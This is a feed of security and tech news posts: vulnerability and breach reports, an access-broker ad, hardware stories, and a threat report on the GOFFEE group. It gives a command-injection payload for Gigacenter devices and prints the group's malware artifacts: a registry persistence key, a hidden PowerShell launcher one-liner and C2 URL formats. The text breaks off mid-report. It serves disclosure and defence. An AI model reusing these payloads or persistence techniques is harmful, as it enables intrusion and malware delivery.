It’s apparent that malware actors around the world are actively checking for potential vulnerabilities in Ivanti firmware updates, as the group Mandiant calls UNC5221 has apparently worked out a way to achieve Remote Code Execution with this vulnerability, and is using it to deploy malware on these systems. This is thought to be the same Chinese group that Microsoft appropriately calls Silk Typhoon.

Our friends at watchTowr have dug a bit more into this issue, and found the exact vulnerable code. It’s in HTTP header handling code, where a specific header is first limited to numerals and the period, and then copied into a fixed size buffer. Remember that observation that this sounds like an IP address? The header is X-Forwarded-For, and setting that to a long string of numbers on a vulnerable Ivanti box will indeed trigger a crash in the web binary. There’s no word yet on how exactly that was used to achieve RCE, but we’re very much hoping the rest of the story comes to light, because it’s an impressive feat.

Bits and Bytes

About 100,000 WordPress sites have a real problem. The Ottokit plugin has an authentication bypass issue, where a blank API key can be matched by setting an empty st_authorization header in an incoming request. The flaw was reported privately on April 3rd, and a fixed version was released the same day. But within hours exploitation attempts were seen in the wild.

Legacy Gigacenter devices expose a TR-069 service on port 6998. That service can be accessed with a simple telnet connection, and the commands entered here are not properly sanitized before being evaluated. Anything inside a $() substitution string is executed locally: $(ping -c5 your.ip.address) This makes for an exceedingly trivial remote code execution attack on these devices.

And finally, the Langflow AI workflow tool has a simple remote exploit vulnerability fixed in version 1.3.0. This vulnerability notably allows bypassing authentication through an API endpoint. While Langflow has Python execution by design, doing it while bypassing authentication is a definite problem. You should update to 1.3.0, and don’t expose Langflow to the Internet at all if you can help it.

hackaday.com/2025/04/11/this-w…

Un avviso è comparso sul sito ufficiale di Busitalia, la società del gruppo Ferrovie dello Stato che gestisce il trasporto pubblico nelle province di Padova e Rovigo. In mezzo agli aggiornamenti sulle nuove corse e alle modifiche delle linee, è stato pubblicato un comunicato dal titolo inequivocabile: “Comunicazione di una violazione dei dati personali”.

Nei giorni scorsi Busitalia è stata vittima di un attacco informatico che ha compromesso i dati personali dei passeggeri registrati. L’incidente riguarda in particolare i canali digitali come l’App Busitalia Veneto e il portale abbonamenti, che vengono utilizzati quotidianamente da migliaia di utenti per gestire spostamenti e titoli di viaggio.
Si informano i clienti dei servizi di trasporto di Busitalia Veneto S.p.A. che i canali App Busitalia Veneto e il portale abbonamenti on line gestiti da un fornitore esterno quale Responsabile del trattamento, hanno subito una violazione dei dati personali.

Nello specifico, il fornitore ha comunicato che è stata riscontrata a livello di un data center esterno, una violazione dei dati personali (esfiltrazione non autorizzata verso un cloud esterno) causata da attività malevole di attori esterni non identificati, avvenuta tra il 29 e il 30 marzo 2025.

Di tali fatti, è stata trasmessa comunicazione a Busitalia Veneto S.p.A. in data 4 aprile u.s., quale Titolare del trattamento dei dati personali in argomento. Nel dettaglio, il fornitore ha comunicato che:

· le categorie di interessati coinvolte sono: Utenti/Contraenti/Abbonati/Clienti attuali o potenziali;

· le categorie di dati personali oggetto della violazione sono: dati anagrafici, dati di contatto, dati di profilazione, dati relativi all’ubicazione. Non sono stati invece coinvolti i dati relativi alle carte di credito, in quanto conservati presso i sistemi di Payment Service Provider;

· le probabili conseguenze della violazione per gli interessati riguardano la potenziale perdita di riservatezza (possibilità che i dati siano divulgati al di fuori di quanto previsto dall’informativa ovvero dalla disciplina di riferimento) e perdita di disponibilità (mancato accesso a servizi, malfunzionamento e difficoltà nell’utilizzo di servizi);

· non appena rilevata la violazione, il sistema è stato reso inaccessibile per un periodo di tempo limitato al fine di consentire le opportune verifiche ed azioni di sicurezza;

· sono state adottate e sono in corso di adozione misure per contenere la violazione e attenuarne gli effetti, nonché volte a prevenire il ripetersi di violazioni analoghe.

Si consiglia comunque, in via del tutto precauzionale, di modificare la password dell’account e di prestare particolare attenzione a e-mail di phishing, messaggi e chiamate sospetti o altre richieste di informazioni personali.

L’Azienda si è immediatamente attivata per analizzare quanto accaduto e per mettere in atto tutte le misure possibili per scongiurare le conseguenze negative di tale attacco verso i propri Clienti. In particolare, Busitalia Veneto S.p.A., oltre al presente comunicato, ha ritenuto di effettuare:

• la notifica preliminare all’Autorità Garante per la protezione dei dati personali;

• la richiesta di informazioni al Responsabile del trattamento, ai sensi dell’art. 28, par. 3, lettere f) e g), del GDPR affinché assista Busitalia Veneto S.p.A. nel garantire il rispetto degli artt. da 32 a 36, con particolare riferimento alla gestione della violazione dei dati personali e alle misure di sicurezza implementate a seguito della stessa.

Per ulteriori informazioni in ordine alla violazione in argomento, le richieste possono essere presentanti direttamente ai contatti istituzionali della società. di seguito indicati:
• privacy@fsbusitaliaveneto.it
• protezionedati@fsbusitalia.it

Infine, si desidera rassicurare i Clienti che Busitalia Veneto S.p.A. è impegnata a proteggere e a salvaguardare qualsiasi dato personale e, anche in questa circostanza, agirà nell’interesse e per la tutela dei diritti dei propri Clienti.

Rimarremo costantemente in contatto con il fornitore per monitorare l’esito degli accertamenti e per assumere ogni altra iniziativa volta a mitigare i possibili effettivi di quanto verificatosi.
La società ha prontamente informato i clienti, specificando che l’attacco ha potenzialmente esposto informazioni sensibili. Tuttavia, non sono ancora stati resi noti i dettagli tecnici sull’entità dell’intrusione, né quali dati siano stati effettivamente compromessi. Busitalia ha dichiarato di aver immediatamente avviato le procedure di sicurezza previste dal GDPR e di essere al lavoro per limitare gli impatti dell’incidente.

Secondo le prime ricostruzioni, l’accesso non autorizzato ai sistemi avrebbe potuto permettere la visualizzazione di dati personali come “dati anagrafici, dati di contatto, dati di profilazione, dati relativi all’ubicazione. Non sono stati invece coinvolti i dati relativi alle carte di credito, in quanto conservati presso i sistemi di Payment Service Provider”

L’accaduto sottolinea ancora una volta la crescente vulnerabilità dei sistemi informatici nel settore dei trasporti pubblici. In un contesto in cui la digitalizzazione dei servizi è sempre più centrale, episodi come questo richiamano l’urgenza di investire in soluzioni di cybersecurity più robuste e in una maggiore sensibilizzazione degli utenti.

L'articolo Attacco hacker a Busitalia: compromessi i dati dei passeggeri proviene da il blog della sicurezza informatica.

It is hard to imagine that it has been more than four decades since two of the original designers of the Sinclair ZX Spectrum broke off to market the Jupiter Ace. [Nemanja Trifunovic] remembers the tiny computer in a recent post, and we always love to recall the old computers that used TVs for screens and audio tape recorders for mass storage.

One thing we always loved about the Jupiter Ace is that while most computers of the era had Basic as their native tongue, the Ace used Forth. As the post points out, while this may have given it great geek cred, it didn’t do much for sales, and the little machine was history within a year. However, the post also proposes that Forth wasn’t the real reason for the machine’s lack of commercial success.

Why did they pick Forth? Why not? It is efficient and interactive. The only real disadvantage was that Basic was more familiar to more people. Books and magazines of the day showed Basic, not Forth. But, according to the post, the real reason for its early demise was that it was already using outdated hardware from day one.

The Ace provided only 3K of RAM and did not offer color graphics. While this may sound laughable today, it wasn’t totally out of the question in 1978. Unfortunately, the Ace debuted in 1982. There were options that offered much more for just a little less. There is also the argument that as users became less technical, they just wanted to load pre-programmed tapes or cartridges and didn’t really care what language was running the computer.

Maybe, but we did and we can’t help but imagine a future where Forth was the language of choice for personal computers. Given how few of these were made, we see a lot of projects around them or, at least, replicas. Of course, these days that can be as simple as a single chip.

hackaday.com/2025/04/11/the-ju…

Would-be spooks and spies, take note: this one-transistor FM transmitter is a circuit you might want to keep in mind for your bugging needs. True, field agents aren’t likely to need to build their own equipment, but how cool a spy would you be if you could?

Luckily, you won’t need too many parts to recreate [Ciprian (YO6DXE)]’s project, most of which could be found in a decently stocked junk bin, or even harvested from e-waste. On the downside, the circuit is pretty fussy, with even minor component value changes causing a major change in center frequency. [Ciprian] had to do a lot of fiddling to get the frequency in the FM band, particularly with the inductor in the LC tank circuit. Even dropping battery voltage shifted the frequency significantly, which required a zener diode to address.

[Ciprian] ran a few tests and managed to get solid copy out to 80 meters range, which is pretty impressive for such a limited circuit. The harmonics, which extend up into the ham bands and possibly beyond, are a bit of a problem; while those could be addressed with a low-pass filter, in practical terms, the power of this little fellow is probably low enough to keep you from getting into serious trouble. Still, it’s best not to push your luck.

While you’re trying your hand at one-transistor circuits, you might want to try [Ciprian]’s one-transistor CW transceiver next.

youtube.com/embed/NxbeOI3g_Gc?…

hackaday.com/2025/04/11/brush-…

Nelle ultime ore è comparso su sul noto forum underground chiuso in lingua russa XSS un annuncio particolarmente interessante pubblicato dall’utente redblueapple2. L’inserzione propone la vendita di accesso amministrativo a un’infrastruttura aziendale italiana operante nella produzione cartaria, con un fatturato dichiarato di circa 10 milioni di dollari.

L’accesso offerto include credenziali di Domain Admin, con la possibilità di ottenere ulteriori credenziali, accesso remoto tramite AnyDesk, e una vasta quantità di dati aziendali, stimati in almeno 700 GB su un singolo host, oltre a numerosi database su altri server. L’inserzione segnala anche la presenza di Trend Micro AV (antivirus) su alcuni sistemi, ma non su tutta la rete. La rete interessata comprende diversi segmenti /24 (tipiche classi di sottoreti IP).

Il prezzo richiesto è 10.000 dollari, con la possibilità di trattativa.

Analisi della Criticità e affidabilità del Threat Actors

Se questa offerta fosse reale e concreta, le conseguenze per l’azienda sarebbero gravissime:

• Compromissione Totale: Il possesso di un account Domain Admin consente il controllo assoluto della rete: gestione utenti, dispositivi, accessi, policy di sicurezza.
• Furto e Diffusione di Dati Sensibili: I 700 GB di dati, più i database distribuiti su altri server, rappresentano un’enorme esposizione di dati industriali, finanziari e personali.
• Minaccia di Ransomware: Gli accessi venduti potrebbero essere utilizzati per lanciare attacchi ransomware devastanti.
• Attacchi Persistenti (APT): L’ampia esposizione e il controllo sugli endpoint permettono la creazione di backdoor e meccanismi di persistenza a lungo termine.
• Possibili Ripercussioni Legali: In caso di violazione dei dati personali (GDPR), l’azienda rischia multe pesanti e danni reputazionali irreparabili.

L’autore dell’annuncio, redblueapple2, si è registrato a gennaio 2023 e ha una bassa attività (10 post, nessuna reazione). Questo solleva alcuni dubbi:

• Pro: Annuncio dettagliato, informazioni tecniche abbastanza precise.
• Contro: Poca storia verificabile; potrebbe essere un tentativo di scam (truffa) o un annuncio di accessi già compromessi da altri e rivenduti.

Nei forum underground, la credibilità degli Initial Access Broker (IAB) è fondamentale: i venditori consolidati pubblicano prove di accesso (screenshot di sistemi interni, liste di host, ecc.), accettano escrow (servizi di deposito a garanzia) e ricevono feedback positivi. Questo annuncio, per ora, non mostra tali prove pubbliche.

Conclusioni

Gli Initial Access Broker (IAB) sono figure chiave nell’ecosistema cybercriminale. Il loro compito è ottenere accessi a reti aziendali (tramite phishing, exploit, vulnerabilità RDP, ecc.) e rivenderli ad altri attori malintenzionati, come:

• Gruppi ransomware, che utilizzano gli accessi per criptare dati e chiedere riscatti.
• Criminali finanziari, per furti di dati bancari o carte di credito.
• Spie industriali, per il furto di proprietà intellettuale.
• Altri broker, per “catene” di rivendita.

Gli IAB riducono i tempi e i costi di un attacco, permettendo ai gruppi specializzati di concentrarsi sulle fasi più redditizie (esfiltrazione, ransomware deployment, estorsione).

Questo tipo di annuncio sottolinea ancora una volta l’importanza di rafforzare la sicurezza interna, implementare monitoraggi avanzati delle reti, controllare rigorosamente gli accessi remoti, e mantenere antivirus e sistemi sempre aggiornati. Se confermato, l’accesso venduto rappresenta una minaccia seria non solo per l’azienda specifica, ma anche per l’intero ecosistema economico e industriale italiano.

L'articolo Una Azienda italiana Sta per essere Violata! Accesso in vendita e revenue da 10 milioni di dollari proviene da il blog della sicurezza informatica.

Abbiamo spesso su Red Hot Cyber ripetuto questa frase: ‘Combattere il cybercrime è come estirpare le erbacce: se lasci le radici, ricresceranno.’ Oggi, più che mai, questa verità si conferma essere vera.

Il 29 gennaio 2025 è stato un giorno che ha lasciato il segno nell’underground digitale: Crack.io, uno dei forum più popolari del panorama hacking e cracking, è caduto sotto il fuoco dell’ennesima operazione internazionale. Operazione Talent – così l’hanno battezzata – non puntava solo a colpire un’infrastruttura, ma a spegnere per sempre una comunità. Non c’è riuscita.

Cracked.io (alias Cracked.sh) è tornato. E, per ora, è qui per restare.

Dopo settimane di silenzio, oggi Crack.io (ora Cracked.sh) è tornato online. Non è una resurrezione improvvisata: dietro il ritorno, c’è stato un lavoro mirato, un periodo di riflessione, e – come dichiarato nel messaggio ufficiale dell’amministrazione – un’importante ristrutturazione del backend, a partire dalla Shoutbox fino al sistema di pagamento, attualmente in fase di transizione.

Il punto centrale, ovviamente, è la sicurezza. I server sequestrati erano cifrati. Tradotto: post, credenziali e messaggi privati non sono finiti in mano a nessuno. Un colpo di fortuna? No, semplice pratica di buon senso (che spesso, però, manca). Tuttavia, l’admin non fa promesse: nel clearweb non esistono garanzie al 100%. Ecco perché l’invito a cambiare password o cancellare i messaggi privati, per chi volesse dormire sonni più tranquilli.

Nuova leadership, vecchia community

L’amministratore ha ora un nuovo “volto”: @Liars, che ha preso le redini della piattaforma. Sarà lui il punto di riferimento per chiunque voglia ripristinare gli upgrade o i crediti acquistati dopo il 25 gennaio (data dell’ultimo backup recuperabile), oppure effettuare nuovi acquisti – per ora, solo via messaggio privato.

Chi conosce il mondo dei forum sa bene che una transizione del genere può segnare un prima e un dopo. Ma Crack.io non è un semplice sito: è una comunità, spesso controversa, sicuramente discussa, ma altrettanto resiliente.

Nei prossimi giorni sono attesi fix continui: ogni bug segnalato sarà affrontato, nel tentativo di rendere l’esperienza utente il più fluida possibile, in un contesto che di fluido – per sua stessa natura – ha ben poco. Nel frattempo, la parola d’ordine è una sola: manualità. Chi vuole qualcosa, lo chiede direttamente. Vecchia scuola? Forse. Ma anche una delle poche strategie efficaci in un contesto dove ogni script automatizzato è potenzialmente una porta aperta.

Il ritorno di Crack.io (pardon, Cracked.sh) non è solo una questione tecnica: è una dichiarazione. Dichiarazione di resilienza, di sfida, e per alcuni anche di sopravvivenza. Il gioco del gatto e del topo tra law enforcement e comunità underground continua, e oggi il topo si è rimesso in piedi.

Dubbi e sospetti: Cracked.io controllato dai federali?

Come spesso accade in casi di “rinascite” così improvvise e ben orchestrate, non mancano le ipotesi più controverse. In un thread pubblicato su BreachForums, l’utente Synaptic ha sollevato un dubbio pesante:

“And it’s probably operated by the feds themselves. I see they’re using a backup and not going from scratch, so that’s something.”

L’osservazione è lucida: perché ripartire da un backup invece di ricostruire da zero? Per alcuni, questo può rappresentare un potenziale segnale di operazione sotto copertura, ipotizzando che l’intera infrastruttura possa oggi essere in mano all’FBI o ad altri enti governativi, con finalità di tracciamento e indagine.

Naturalmente, si tratta di speculazioni. Ma nel mondo dell’underground digitale, la paranoia non è un bug: è una feature. E anche la rinascita di Crack.io dovrà fare i conti con una fiducia da riconquistare, un utente alla volta.

La vera domanda, ora, non è se il forum sopravviverà. Ma per quanto.

L'articolo La Rinascita di Crack.io: Combattere il cybercrime è come estirpare erbacce: se lasci le radici, ricresceranno proviene da il blog della sicurezza informatica.

If you paid attention to advertising in 1980s Britain, you were never far from Economy 7. It was the magic way to heat your house for less, using storage heaters which would run at night using cheap electricity, and deliver warmth day-long. Behind it all was an unseen force, a nationwide radio switching signal transmitted using the BBC’s 198 kHz Long Wave service. Now in 2025 the BBC Radio 4 Long Wave service it relies on is to be turned off, rendering thousands of off-peak electricity meters still installed, useless. [Ringway Manchester] is here to tell the tale.

The system was rolled out in the early 1980s, and comprised of a receiver box which sat alongside your regular electricity meter and switched in or out your off-peak circuit. The control signal was phase-modulated onto the carrier, and could convey a series of different energy use programs. 198 kHz had the useful property due to its low frequency of universal coverage, making it the ideal choice. As we’ve reported in the past the main transmitter at Droitwich is to be retired due to unavailability of the high-power vacuum tubes it relies on, so now time’s up for Economy 7 too. The electricity companies are slow on the uptake despite years of warning, so there’s an unseemly rush to replace those old meters with new smart meters. The video is below the break.

The earliest of broadcast bands may be on the way out, but it’s not entirely over. There might even be a new station on the dial for some people.

youtube.com/embed/DEjDdtCRNlQ?…

hackaday.com/2025/04/10/farewe…

Once the domain of esoteric scientific and business computing, floating point calculations are now practically everywhere. From video games to large language models and kin, it would seem that a processor without floating point capabilities is pretty much a brick at this point. Yet the truth is that integer-based approximations can be good enough to hit the required accuracy. For example, approximating floating point multiplication with integer addition, as [Malte Skarupke] recently had a poke at based on an integer addition-only LLM approach suggested by [Hongyin Luo] and [Wei Sun].

As for the way this works, it does pretty much what it says on the tin: adding the two floating point inputs as integer values, followed by adjusting the exponent. This adjustment factor is what gets you close to the answer, but as the article and comments to it illustrate, there are plenty of issues and edge cases you have to concern yourself with. These include under- and overflow, but also specific floating point inputs.

Unlike in scientific calculations where even minor inaccuracies tend to propagate and cause much larger errors down the line, graphics and LLMs do not care that much about float point precision, so the ~7.5% accuracy of the integer approach is good enough. The question is whether it’s truly more efficient as the paper suggests, rather than a fallback as seen with e.g. integer-only audio decoders for platforms without an FPU.

Since one of the nice things about FP-focused vector processors like GPUs and derivatives (tensor, ‘neural’, etc.) is that they can churn through a lot of data quite efficiently, the benefits of shifting this to the ALU of a CPU and expecting (energy) improvements seem quite optimistic.

hackaday.com/2025/04/10/using-…

While some companies like Apple have gone all-in on the ARM architecture, others are more hesitant to dive into the deep end. For example, Microsoft remains heavily invested in the x86 architecture and although it does have some ARM offerings, a lot of them feel a bit half-baked. So you might question why someone like [Gustave] has spent so much time getting Windows to run on unusual ARM platforms. But we don’t need much of a reason to do something off-the-wall like that around these parts, so take a look at his efforts to get Windows for ARM running on a smartwatch.

The smartwatch in question here is a Pixel Watch 3, which normally runs a closed-source Android implementation called Wear OS. The bootloader can be unlocked, so [Gustave] took that approach to implement a few clever workarounds to get Windows to boot including adding UEFI to the watch. During the process Google updated these devices to Android 15, though, which broke some of these workarounds. The solution at that point was to fake a kernel header and re-implement UEFI and then load Windows (technically Windows PE) onto the watch.

Although this project was released on April 1, and is by [Gustave]’s own admission fairly ridiculous and not something he actually recommends anyone do, he does claim that it’s real and provides everything needed for others to run Windows on their smartwatches if they want to. Perhaps one of our readers will be brave enough to reproduce the results and post about it in the comments. In the meantime, there are a few more open options for smartwatches available if you’re looking for something to tinker with instead.

Thanks to [Ruhan] for the tip!

hackaday.com/2025/04/10/window…

As computers age, a dedicated few work towards keeping some of the more interesting ones running. This is often a losing battle of sorts, as the relentless march of time comes for us all, human and machine alike. So as fewer and fewer of these machines remain new methods are needed to keep them running as best they can. [CallousCoder] demonstrates a way of building up a new keyboard for a Commodore 64 which both preserves the original look and feel of the retro computer but also adds some modern touches.

One of the main design differences between many computers of the 80s and modern computers is that the keyboard was often built in to the case of the computer itself. For this project, that means a custom 3D printed plate that can attach to the points where the original keyboard would have been mounted inside the case of the Commodore. [CallousCoder] is using a print from [Wolfgang] to get this done, and with the plate printed and a PCB for the keys it was time to start soldering. The keyboard uses modern switches and assembles like most modern keyboards do, with the exception of the unique layout for some of the C64 keys including a latching shift key, is fairly recognizable for anyone who has put together a mechanical keyboard before.

[CallousCoder] is using the original keycaps from a Commodore 64, so there is an additional step of adding a small adapter between the new switches and the old keycaps. But with that done and some amount of configuring, he has a modern keyboard that looks like the original. If you’re more a fan of the original hardware, though, you can always take an original C64 keyboard and convert it to USB to use it on your modern machines instead.

youtube.com/embed/fT9_SzN4JhA?…

hackaday.com/2025/04/10/a-new-…

Ion thrusters are an amazing spacecraft propulsion technology, providing very high efficiency with relatively little fuel. Yet getting one to produce more thrust than that required to lift a sheet of A4 paper requires a lot of electricity. This is why they have been only used for applications where sustained thrust and extremely low fuel usage are important, such as the attitude management of satellites and other spacecraft. Now researchers in New Zealand have created a prototype magnetoplasmadynamic (MPD) thruster with a superconducting electromagnet that is claimed to reduce the required input power by 99% while generating a three times as strong a magnetic field.

Although MPD thrusters have been researched since the 1970s – much like their electrostatic cousins, Hall-effect thrusters – the power limitations on the average spacecraft have limited mission profiles. Through the use of a high-temperature superconducting electromagnet with an integrated cryocooler, the MPD thruster should be able to generate a very strong field, while only sipping power. Whether this works and is as reliable as hoped will be tested this year when the prototype thruster is installed on the ISS for experiments.

hackaday.com/2025/04/10/improv…

Il nome WK Kellogg Co. è sinonimo di colazione in milioni di case americane. Ma oggi, quel nome è finito sotto i riflettori per tutt’altri motivi: un data breach importante ha colpito l’azienda, con dati personali dei dipendenti trafugatida un attore ben noto nel panorama cybercriminale: il gruppo ransomware CL0P.

L’attacco è avvenuto il 7 dicembre 2024, ma incredibilmente è stato scoperto quasi tre mesi dopo, il 27 febbraio 2025. Un vuoto temporale inquietante, che solleva interrogativi sull’efficacia dei controlli di sicurezza e sul monitoraggio delle infrastrutture digitali.

La dinamica dell’attacco: la porta d’ingresso? Cleo

Il gruppo CL0P ha colpito sfruttando vulnerabilità zero-day nella piattaforma di file transfer del fornitore Cleo, utilizzata da WK Kellogg Co. per trasferire file contenenti dati personali identificabili (PII) verso i fornitori di servizi HR. Nomi, numeri di previdenza sociale e altre informazioni altamente sensibili dei dipendenti sono stati esfiltrati silenziosamente dai server violati.

In un documento ufficiale di regolamentazione inviato all’ufficio del Procuratore Generale del Maine, WK Kellogg Co. ha confermato che almeno un dipendente è stato colpito dal hack, che si è verificato a dicembre 2024 a causa di una vulnerabilità nel software di trasferimento file di Cleo.

Il 25 febbraio 2025, il gruppo CL0P ha pubblicato l’incidente sul Dark Web, mettendo pressione mediatica e commerciale sull’azienda.

Solo il 4 aprile 2025, WK Kellogg Co. ha notificato ufficialmente la violazione alle autorità statali e avviato le comunicazioni agli interessati.

Terze parti: anello debole della catena

Ancora una volta, l’anello debole della catena di sicurezza si è rivelato essere un fornitore esterno. Le organizzazioni troppo spesso si illudono che la sicurezza termini al confine della propria rete.

Il caso Kellogg ci ricorda quanto sia fondamentale:

• Assicurarsi che i fornitori adottino misure di sicurezza robuste, inclusi protocolli di autenticazione multifattoriale (MFA).
• Verificare regolarmente la sicurezza dei fornitori attraverso test di penetrazione e audit.
• Gestire correttamente le patch di sicurezza, soprattutto per i software di trasferimento file.

Conclusione

Questo non è solo un altro data breach: è un campanello d’allarme per tutte le aziende che si affidano a fornitori esterni per la gestione dei dati sensibili. L’incidente che ha coinvolto WK Kellogg Co. mette in evidenza come la sicurezza non possa più essere delegata, ma deve essere una priorità condivisa tra tutte le parti coinvolte.

Per i dipendenti di Kellogg, il rischio è reale: furto di identità, frodi finanziarie e attacchi di phishing mirato. Per l’azienda, l’impatto va ben oltre i dati persi: c’è un danno reputazionale, economico e una falla nella protezione della privacy dei propri lavoratori.

In un mondo in cui la supply chain digitale è sempre più complessa e interconnessa, ogni azienda deve alzare il livello di guardia e garantire che tutti i suoi partner e fornitori rispettino gli stessi standard di sicurezza. L’incidente di Kellogg è una chiara lezione: la protezione delle informazioni sensibili è una responsabilità collettiva, e ogni anello della catena deve essere forte quanto l’anello più debole.

L'articolo Kellogg’s: il gruppo ransomware CL0P buca i server del fornitore Cleo e ruba dati sensibili proviene da il blog della sicurezza informatica.

Is a bicycle like a motorcycle? Of course, the answer is it is and it isn’t. Saying something is “like” something else presupposes a lot of hidden assumptions. In the category “things with two wheels,” we have a winner. In the category “things that require gasoline,” not so much. We’ve noticed before that news stories about astronomy often talk about “sun-like stars” or “Earth-like planets.” But what does that really mean? [Paul Gilster] had the same questions, if you want to read his opinion about it.

[Paul] mentions that even textbooks can’t agree. He found one that said that Centauri A was “sun-like” while Centauri B was sometimes considered sun-like and other times not. So while Paul was looking at the examples of press releases and trying to make sense of it all, we thought we’d just ask you. What makes a star like our sun? What makes a planet like our planet?

Part of the problem is we don’t really know as much as we would like about other planets and their stars. We know more than we used to, of course. Still, it would be like wondering if the motorcycle was like that distant point of light. Maybe.

This is one of those things that seems deceptively simple until you start thinking about it. Is a planet Earth-like if it is full of water? What if it is totally covered in water? What if there’s no life at all? But life isn’t it, either. Methane-breathing silicon-based life probably doesn’t live on Earth-like planets.

Maybe Justice Potter Stewart was on to something when he said, “I know it when I see it!” Unfortunately, that’s not very scientific.

So what do you think? What’s a sun-like star? What’s an Earth-like planet? Discuss in the comments.

Don’t even get us started on super-earths, whatever they are. We are learning more about our neighbors every day, though.

hackaday.com/2025/04/10/ask-ha…

Around these parts, we generally celebrate clever hacks that let you do more with less. So if somebody wrote in to tell us how they used multiplexing to drive the front panel of their latest gadget with fewer pins on the microcontroller than would normally be required, we’d be all over it. But what if that same hack ended up leading to a common failure in a piece of consumer hardware?

As [Jim] recently found out, that’s precisely what seems to be ailing the Meaco Arete dehumidifier. When his stopped working, some Internet searching uncovered the cause of the failure: if a segment in the cheap LED display dies and shorts out, the multiplexing scheme used to interface with the front panel essentially reads that as a stuck button and causes the microcontroller to lock up. He passed the info along to us as a cautionary tale of how over-optimization can come with a hidden cost down the line.

Judging by the thread from the Badcaps forum, the problem was identified last summer. But unless you had this particular dehumidifier and went searching for it, it’s not the kind of thing that you’d otherwise run into. The users start by going through the normal diagnostic steps, but come up short (no pun intended).
Given its simplicity, the front panel PCB was not an obvious failure point.
Eventually, user [CG2] resorts to buzzing out all the connections to the two digit seven-segment LED display on the front panel, and finds a dead short on one of the segments. After removing the display, the dehumidifier sprung back to life and everything worked as expected. It wasn’t hard to identify a suitable replacement display on AliExpress, and swapping it out brought the appliance back up to full functionality.

Now to be fair, a shorted out component is likely to cause havoc wherever it might be in the circuit, and as such perhaps it’s the lowest-bidder LED display with the unusually high failure rate that’s really to blame here. But it’s also more likely you’d interpret a dark display as a symptom of the problem rather than the cause, making this a particularly tricky failure to identify.

In any event, judging by how many people seem to be having the same problem, and the fact that there’s now an iFixit guide on how to replace the shorted display, it seems like this particular product was cost-optimized just a bit too far.

hackaday.com/2025/04/10/clever…

GOFFEE is a threat actor that first came to our attention in early 2022. Since then, we have observed malicious activities targeting exclusively entities located in the Russian Federation, leveraging spear phishing emails with a malicious attachment. Starting in May 2022 and up until summer of 2023, GOFFEE deployed modified Owowa (malicious IIS module) in their attacks. As of 2024, GOFFEE started to deploy patched malicious instances of explorer.exe via spear phishing.

During the second half of 2024, GOFFEE continued to launch targeted attacks against organizations in Russia, utilizing PowerTaskel, a non-public Mythic agent written in PowerShell, and introducing a new implant that we dubbed “PowerModul”. The targeted sectors included media and telecommunications, construction, government entities, and energy companies.

This report in a nutshell:

• GOFFEE updated distribution schemes.
• A previously undescribed implant dubbed PowerModul was introduced.
• GOFFEE is increasingly abandoning the use of PowerTaskel in favor of a binary Mythic agent for lateral movement.

For more information, please contact: intelreports@kaspersky.com

Technical details

Initial infection

Currently, several infection schemes are being used at the same time. The starting point is typically a phishing email with a malicious attachment, but the schemes diverge slightly from there. We will review two of them relevant at the time of the research.

The first infection scheme uses a RAR archive with an executable file masquerading as a document. In some cases, the file name uses a double extension, such as “.pdf.exe” or “.doc.exe”. When the user clicks the executable file, a decoy document is downloaded from the C2 and opened, while malicious activity is carried out in parallel.

Example of decoy document

The file itself is a Windows system file (explorer.exe or xpsrchvw.exe), with part of its code patched with a malicious shellcode. The shellcode is similar to what we saw in earlier attacks, but in addition contains an obfuscated Mythic agent, which immediately begins communicating with the command-and-control (C2) server.

Malware execution flow v1

In the second case, the RAR archive contains a Microsoft Office document with a macro that serves as a dropper.

Malware execution flow v2

Malicious document with a macro

When a document is opened, scrambled text and a warning image with the message, “This document was created in an earlier version of Microsoft Office Word. For Microsoft Office Word to display the contents correctly, click ‘Enable Content'”, are shown. Clicking “Enable Content” activates a macro that hides the warning image and restores the text through a normal character replacement operation. Additionally, the macro creates two files in the user’s current folder: an HTA and a PowerShell file, and writes the HTA into the registry using the “LOAD” registry value of the “HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows” registry key.
HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows
"LOAD"="C:\Users\<USER_NAME>\UserCache.ini.hta"
Although the macro itself does not start anything or create new processes, the programs listed in the “LOAD” value of the registry key are run automatically for the currently logged-on user.

UserCache.ini.hta content

The malicious HTA runs a PowerShell script (PowerModul), but not directly. Instead, it first uses cmd.exe and output redirection to drop a JavaScript file named “UserCacheHelper.lnk.js” onto the disk, and then executes it. Only then does the dropped JavaScript run PowerModul:
cmd.exe /c if not exist "C:\Users\user\UserCacheHelper.lnk.js" echo var objService = GetObject("winmgmts:\\\\.\\root\\cimv2");var objStartup = objService.Get("Win32_ProcessStartup");var objConfig = objStartup.SpawnInstance_();objConfig.ShowWindow = 0;var processClass = objService.Get("Win32_Process");var command = "powershell.exe -c \"$raw= Get-Content C:\\Users\\user\\UserCache.ini;Invoke-Expression $raw\"";var result = processClass.Create(command, null, objConfig, 0); > C:\Users\user\UserCacheHelper.lnk.js
It is worth noting that “UserCache.ini.hta” and “UserCacheHelper.lnk.js” contain strings with full paths to the files, including the local user’s name, instead of environment variables. As a result, the control keys, as well as the file sizes, will vary depending on the current user’s name.

UserCacheHelper.lnk.js content

The “UserCacheHelper.lnk.js” file launches a PowerShell file named “UserCache.ini”, dropped by the initial macro. This file contains encoded PowerModul.

PowerModul

PowerModul is a PowerShell script capable of receiving and executing additional PowerShell scripts from the C2 server. The first instances of this implant’s usage were detected at the beginning of 2024. Initially, it was used to download and launch the PowerTaskel implant, and was considered a relatively minor component for launching PowerTaskel. However, its use of a unique protocol, distinct payload types, and a C2 server different from PowerTaskel’s led us to classify it as a separate family.

UserCache.ini content

In the scheme being described, the PowerModul code is embedded in the “UserCache.ini” file as a Base64-encoded string. The beginning and end of the decoded script are shown in the images below, while the middle section contains a copy of the HTA file, as well as code responsible for dropping the HTA file onto the disk, writing it to the registry, and hiding the file by changing its attributes to “Hidden”. Essentially, this code replicates part of the functionality of the VBA macro found in the Word document, except for file hiding, which was not implemented in VBA.

Beginning of PowerModul

End of PowerModul

When accessing the C2, PowerModul appends an infected system identifier string to the C2 URL, consisting of the computer name, username, and disk serial number, separated with underscores:
hxxp://62.113.114[.]117/api/texts/{computer_name}_{username}_{serial_number}
The response from the C2 is in XML format, complete with scripts encoded in Base64:
HTTP/1.1 200 OK
Server: nginx/1.18.0
Content-Type: text/plain
Content-Length: 35373
Connection: keep-alive

<Configs>
<Config>
<Module>ZnVuY3Rpb24gQ3JlYXRlVkJTRmlsZSgkYkJkcmxzRCwgJGlMc1FybVQsIC....==</Module>
<CountRuns>250</CountRuns>
<Interval>1</Interval>
</Config>
<Config>
